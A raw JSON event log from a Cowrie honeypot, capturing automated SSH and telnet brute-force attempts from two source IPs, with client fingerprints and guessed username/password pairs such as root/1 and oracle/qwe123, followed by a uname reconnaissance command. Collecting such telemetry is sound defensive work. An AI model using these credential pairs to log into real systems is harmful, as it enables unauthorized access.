{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39254,"dst_ip":"1.2.3.4","dst_port":23,"session":"6224a7e60448","protocol":"telnet","message":"New connection: 212.227.235.229:39254 (1.2.3.4:23) [session: 6224a7e60448]","sensor":"my-vps","timestamp":"2025-08-31T00:44:10.283051Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59992,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8671b64abc8","protocol":"ssh","message":"New connection: 212.227.125.160:59992 (1.2.3.4:22) [session: c8671b64abc8]","sensor":"my-vps","timestamp":"2025-08-31T00:44:11.630335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:11.631534Z","src_ip":"212.227.125.160","session":"c8671b64abc8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:44:11.705797Z","src_ip":"212.227.125.160","session":"c8671b64abc8"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:11.939556Z","src_ip":"212.227.125.160","session":"c8671b64abc8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:13.036969Z","src_ip":"212.227.125.160","session":"c8671b64abc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50790,"dst_ip":"1.2.3.4","dst_port":22,"session":"952a948f7bd4","protocol":"ssh","message":"New connection: 212.227.125.160:50790 (1.2.3.4:22) [session: 952a948f7bd4]","sensor":"my-vps","timestamp":"2025-08-31T00:44:22.113934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:22.114846Z","src_ip":"212.227.125.160","session":"952a948f7bd4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:44:22.190847Z","src_ip":"212.227.125.160","session":"952a948f7bd4"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:22.414888Z","src_ip":"212.227.125.160","session":"952a948f7bd4"}
{"eventid":"cowrie.session.closed","duration":13.010148763656616,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:23.293128Z","src_ip":"212.227.235.229","session":"6224a7e60448"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:23.571072Z","src_ip":"212.227.125.160","session":"952a948f7bd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54950,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbcfadcc7bfc","protocol":"ssh","message":"New connection: 212.227.125.160:54950 (1.2.3.4:22) [session: bbcfadcc7bfc]","sensor":"my-vps","timestamp":"2025-08-31T00:44:32.484339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:32.485594Z","src_ip":"212.227.125.160","session":"bbcfadcc7bfc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:44:32.562496Z","src_ip":"212.227.125.160","session":"bbcfadcc7bfc"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:44:32.794902Z","src_ip":"212.227.125.160","session":"bbcfadcc7bfc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:44:33.119636Z","src_ip":"212.227.125.160","session":"bbcfadcc7bfc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:44:33.120378Z","src_ip":"212.227.125.160","session":"bbcfadcc7bfc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:33.195635Z","src_ip":"212.227.125.160","session":"bbcfadcc7bfc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:33.196615Z","src_ip":"212.227.125.160","session":"bbcfadcc7bfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48140,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8d744f1a5e7","protocol":"ssh","message":"New connection: 212.227.235.229:48140 (1.2.3.4:22) [session: c8d744f1a5e7]","sensor":"my-vps","timestamp":"2025-08-31T00:44:34.169295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:44:34.170148Z","src_ip":"212.227.235.229","session":"c8d744f1a5e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:44:34.471777Z","src_ip":"212.227.235.229","session":"c8d744f1a5e7"}
{"eventid":"cowrie.login.failed","username":"mother","password":"mother","message":"login attempt [mother/mother] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:35.719852Z","src_ip":"212.227.235.229","session":"c8d744f1a5e7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:37.023431Z","src_ip":"212.227.235.229","session":"c8d744f1a5e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47936,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a467b231290","protocol":"ssh","message":"New connection: 212.227.235.229:47936 (1.2.3.4:22) [session: 6a467b231290]","sensor":"my-vps","timestamp":"2025-08-31T00:44:42.057017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:44:42.059912Z","src_ip":"212.227.235.229","session":"6a467b231290"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:44:42.301394Z","src_ip":"212.227.235.229","session":"6a467b231290"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35582,"dst_ip":"1.2.3.4","dst_port":22,"session":"947570fb753b","protocol":"ssh","message":"New connection: 212.227.125.160:35582 (1.2.3.4:22) [session: 947570fb753b]","sensor":"my-vps","timestamp":"2025-08-31T00:44:42.900808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:42.901573Z","src_ip":"212.227.125.160","session":"947570fb753b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:44:42.975876Z","src_ip":"212.227.125.160","session":"947570fb753b"}
{"eventid":"cowrie.login.failed","username":"liy","password":"123456","message":"login attempt [liy/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:43.262226Z","src_ip":"212.227.235.229","session":"6a467b231290"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:43.317154Z","src_ip":"212.227.125.160","session":"947570fb753b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:44.475214Z","src_ip":"212.227.125.160","session":"947570fb753b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:44.505664Z","src_ip":"212.227.235.229","session":"6a467b231290"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35154,"dst_ip":"1.2.3.4","dst_port":22,"session":"7241de804db8","protocol":"ssh","message":"New connection: 212.227.235.229:35154 (1.2.3.4:22) [session: 7241de804db8]","sensor":"my-vps","timestamp":"2025-08-31T00:44:49.232366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:49.691014Z","src_ip":"212.227.235.229","session":"7241de804db8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:44:49.782442Z","src_ip":"212.227.235.229","session":"7241de804db8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48560,"dst_ip":"1.2.3.4","dst_port":22,"session":"d20f06777078","protocol":"ssh","message":"New connection: 212.227.125.160:48560 (1.2.3.4:22) [session: d20f06777078]","sensor":"my-vps","timestamp":"2025-08-31T00:44:53.340433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:53.373042Z","src_ip":"212.227.125.160","session":"d20f06777078"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:44:53.414252Z","src_ip":"212.227.125.160","session":"d20f06777078"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:44:53.799231Z","src_ip":"212.227.125.160","session":"d20f06777078"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:44:54.041232Z","src_ip":"212.227.125.160","session":"d20f06777078"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:44:54.041993Z","src_ip":"212.227.125.160","session":"d20f06777078"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:54.115826Z","src_ip":"212.227.125.160","session":"d20f06777078"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:54.116907Z","src_ip":"212.227.125.160","session":"d20f06777078"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"12345678","message":"login attempt [daemon/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:55.425991Z","src_ip":"212.227.235.229","session":"7241de804db8"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:56.811239Z","src_ip":"212.227.235.229","session":"7241de804db8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53098,"dst_ip":"1.2.3.4","dst_port":22,"session":"81608c5f64ac","protocol":"ssh","message":"New connection: 212.227.125.160:53098 (1.2.3.4:22) [session: 81608c5f64ac]","sensor":"my-vps","timestamp":"2025-08-31T00:45:03.787951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:03.789226Z","src_ip":"212.227.125.160","session":"81608c5f64ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:45:03.863256Z","src_ip":"212.227.125.160","session":"81608c5f64ac"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-31T00:45:04.092968Z","src_ip":"212.227.125.160","session":"81608c5f64ac"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:05.251132Z","src_ip":"212.227.125.160","session":"81608c5f64ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45794,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f7a66b7b59a","protocol":"telnet","message":"New connection: 212.227.235.229:45794 (1.2.3.4:23) [session: 1f7a66b7b59a]","sensor":"my-vps","timestamp":"2025-08-31T00:45:10.449944Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54632,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfcfa0a8f452","protocol":"ssh","message":"New connection: 212.227.125.160:54632 (1.2.3.4:22) [session: cfcfa0a8f452]","sensor":"my-vps","timestamp":"2025-08-31T00:45:10.760791Z"}
